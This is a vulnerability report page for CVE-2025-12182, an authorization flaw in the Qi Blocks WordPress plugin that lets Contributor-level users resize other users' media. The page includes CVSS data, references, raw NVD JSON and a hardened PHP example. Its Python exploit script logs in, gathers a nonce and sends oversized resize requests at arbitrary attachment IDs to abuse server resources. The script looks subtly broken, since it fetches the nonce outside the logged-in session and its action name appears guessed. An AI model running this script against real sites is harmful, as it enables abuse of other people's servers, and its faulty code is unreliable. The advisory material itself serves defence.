Security Vulnerability Report
CVE-2025-12182 CVSS 4.3 MEDIUM

CVE-2025-12182

Published: 2025-11-15 04:15:56
Last Modified: 2026-04-15 00:35:42

Description

The Qi Blocks plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the `resize_image_callback()` function in all versions up to, and including, 1.4.3. This is due to the plugin not properly verifying that a user has permission to resize a specific attachment. This makes it possible for authenticated attackers, with Contributor-level access and above, to resize arbitrary media library images belonging to other users, which can result in unintended file writes, disk consumption, and server resource abuse through processing of large images.
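The flaw is an object-level authorization gap: the callback accepts an attachment ID and acts on it without confirming the caller may edit that particular attachment. The following is an added example of how such an admin-ajax resize callback should be guarded; it is not Qi Blocks' own code, and the hook name, action name, nonce action and size limit are assumptions.

```php
<?php
// Added example (not the plugin's code): a hardened admin-ajax image-resize
// callback that performs the per-attachment capability check described as
// missing in CVE-2025-12182. Hook, nonce action and limits are hypothetical.

add_action( 'wp_ajax_example_resize_image', 'example_resize_image_callback' );

function example_resize_image_callback() {
    // 1. CSRF: the request must carry a nonce issued for this action.
    check_ajax_referer( 'example_resize_image_nonce', 'nonce' );

    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;
    $width         = isset( $_POST['width'] )  ? absint( $_POST['width'] )  : 0;
    $height        = isset( $_POST['height'] ) ? absint( $_POST['height'] ) : 0;

    // 2. The target must exist and be an image attachment.
    if ( ! $attachment_id
        || 'attachment' !== get_post_type( $attachment_id )
        || ! wp_attachment_is_image( $attachment_id ) ) {
        wp_send_json_error( 'invalid attachment', 400 );
    }

    // 3. Object-level authorization (the missing check). 'edit_post' on the
    //    attachment maps to edit_posts for the owner and edit_others_posts for
    //    everyone else, so a Contributor can only resize their own uploads.
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Bound requested dimensions to limit disk writes and CPU use.
    $max_dimension = 2048; // assumed limit
    if ( $width < 1 || $height < 1 || $width > $max_dimension || $height > $max_dimension ) {
        wp_send_json_error( 'dimensions out of range', 400 );
    }

    $editor = wp_get_image_editor( get_attached_file( $attachment_id ) );
    if ( is_wp_error( $editor ) ) {
        wp_send_json_error( $editor->get_error_message(), 500 );
    }
    $editor->resize( $width, $height, true );
    $saved = $editor->save(); // writes a new sized file next to the original
    if ( is_wp_error( $saved ) ) {
        wp_send_json_error( $saved->get_error_message(), 500 );
    }
    wp_send_json_success( $saved );
}
```

Checks 2 and 3 are what close this class of bug; check 1 alone (a nonce) only proves the request came from a logged-in session, not that the session owns the attachment.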

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Qi Blocks WordPress Plugin, all versions up to and including 1.4.3 (fixed in the version after 1.4.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import re

# CVE-2025-12182 PoC - Qi Blocks Unauthorized Image Resize
# Target: WordPress site with Qi Blocks plugin <= 1.4.3

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def get_nonce(site_url):
    """Extract WordPress nonce for AJAX requests"""
    resp = requests.get(f"{site_url}/wp-admin/", timeout=10)
    nonce_match = re.search(r'nonce" value="([a-z0-9]+)"', resp.text)
    if nonce_match:
        return nonce_match.group(1)
    return None


def exploit(site_url, username, password):
    """Exploit unauthorized image resize vulnerability"""
    session = requests.Session()

    # Step 1: Login to WordPress
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{site_url}/wp-admin/",
        'testcookie': '1'
    }
    resp = session.post(f"{site_url}/wp-login.php", data=login_data, timeout=10)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Get AJAX nonce
    nonce = get_nonce(site_url)
    if not nonce:
        print("[-] Failed to get nonce")
        return False

    # Step 3: Get target image ID (any image in media library)
    # In real attack, attacker would enumerate image IDs
    target_image_id = 1  # Example image ID

    # Step 4: Trigger unauthorized image resize
    resize_data = {
        'action': 'qi_blocks_resize_image',
        'nonce': nonce,
        'attachment_id': target_image_id,
        'width': 5000,   # Large size to cause resource abuse
        'height': 5000
    }
    resp = session.post(f"{site_url}/wp-admin/admin-ajax.php", data=resize_data, timeout=30)
    if resp.status_code == 200:
        print(f"[+] Image resize triggered for attachment ID: {target_image_id}")
        print(f"[+] Response: {resp.text[:200]}")
        return True
    else:
        print(f"[-] Request failed with status: {resp.status_code}")
        return False


if __name__ == "__main__":
    exploit(TARGET_URL, USERNAME, PASSWORD)
```

References

Weakness: CWE-284 (Improper Access Control)

https://plugins.trac.wordpress.org/browser/qi-blocks/tags/1.4.3/inc/media/class-qi-blocks-media.php#L138 (vulnerable code, version 1.4.3)
https://plugins.trac.wordpress.org/changeset/3387712/qi-blocks/trunk/inc/media/class-qi-blocks-media.php (fix changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/41b0b12f-ff52-4913-aa54-3fbaf0839959?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12182",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-15T04:15:55.570",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Qi Blocks plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the `resize_image_callback()` function in all versions up to, and including, 1.4.3. This is due to the plugin not properly verifying that a user has permission to resize a specific attachment. This makes it possible for authenticated attackers, with Contributor-level access and above, to resize arbitrary media library images belonging to other users, which can result in unintended file writes, disk consumption, and server resource abuse through processing of large images."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-284"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/qi-blocks/tags/1.4.3/inc/media/class-qi-blocks-media.php#L138", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3387712/qi-blocks/trunk/inc/media/class-qi-blocks-media.php", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/41b0b12f-ff52-4913-aa54-3fbaf0839959?source=cve", "source": "[email protected]"}
    ]
  }
}
```